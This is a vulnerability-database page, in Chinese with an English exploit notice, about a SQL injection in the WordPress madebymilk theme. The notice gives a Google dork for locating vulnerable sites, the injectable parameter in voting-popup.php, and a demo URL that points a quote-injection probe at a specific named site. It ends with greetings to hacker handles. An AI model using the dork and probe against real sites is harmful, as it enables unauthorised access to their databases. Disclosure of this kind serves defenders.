WordPress Madebymilk SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046084 漏洞类型
发布时间 2012-11-21 更新时间 2012-11-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110146
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Wordpress madebymilk Theme SQL Injection   ((|))
# Google Dork: inurl:/madebymilk/voting-popup.php           ((|))
# Exploit Author: Ashiyane Digital Security Team                #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #

#* Location:  http://site.com/wp-content/                       #
#* /themes/madebymilk/                                          #
#* voting-popup.php?id=[SQLi]                                   #
#* Demo: https://madebymilkcontest.com/wp-content/plugins/      #
#* madebymilk/voting-popup.php?id=null'                         #



#* Sp Tnx To: Muslims From All Over The World                   #
#* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,,ERroR   #
#* 0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad #
#* Black-Hole,Classic,Encoder,HASSAN20,HidDeEn,hossein19123     #
#* jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu         #
#* MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H  #
#* Pr0grammer,PrinceofHacking,Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3#
#* The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X      ((|))    #
#* Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R *  ((|))  * #
#* And All Of My Friends                           -|- ((|)) -|-#
#* The Last One : My Self, B4b4K KH4TaR            /|\ ((|)) /|\#